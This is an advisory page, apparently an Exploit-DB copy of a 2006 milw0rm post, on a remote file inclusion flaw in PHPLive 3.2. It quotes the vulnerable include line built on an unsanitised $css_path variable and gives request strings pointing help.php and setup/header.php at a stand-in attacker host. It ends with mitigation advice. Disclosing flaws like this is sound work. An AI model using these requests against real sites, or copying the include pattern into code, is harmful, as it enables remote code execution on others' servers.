PHPLive 3.2 Remote Injection Vulnerability

vendor:

PHPLive

by:

magnific

7,5

CVSS

HIGH

Remote Injection Vulnerability

N/A

CWE

Product Name: PHPLive

Affected Version From: all

Affected Version To: all

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PHPLive 3.2 Remote Injection Vulnerability

Some variables are not properly sanitized before being used. Here you will find the variables not properly sanitized: help.php?css_path=htt://attacker setup/header.php?css_path=htt://attacker

Mitigation:

Sanitize the variable $css_path, in all files affecteds. Active SAFE_MODE on server, for local security.

Source

Exploit-DB raw data:

     Advisory: PHPLive 3.2 Remote Injection Vulnerability
 Release Date: 2006/07/23
       Author: magnific
   Discovered: aneurysm.inc security reserach
         Risk: High
Vendor Status: not contacted | no patch available
  Vendor Site: www.osicodes.com
      Contact: aneurysm_inc[at]hotmail[dot]com
      Version: all

-----------
Overview:

Some variables are not properly sanitized before being used.
Here you will find the variables not properly sanitized:

-----------
Vulnerable code:

help.php /setup/header.php etc..

<? $css_path = ( !isset( $css_path ) ) ? $css_path = "./" : $css_path ; include_once( $css_path."css/default.php" ) ; ?>

-----------
Execution:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker


-----------
Vendor:

At the moment, there are no solutions from the vendor. If you want to make
sure the code and your PHPLIVE you have to sanitize the variable $css_path,
in all files affecteds.
Active SAFE_MODE on server, for local security.

---------------------------
aneurysm.inc security reserach
irc.gigachat.net
#aneurysm.inc
---------------------------

# milw0rm.com [2006-07-23]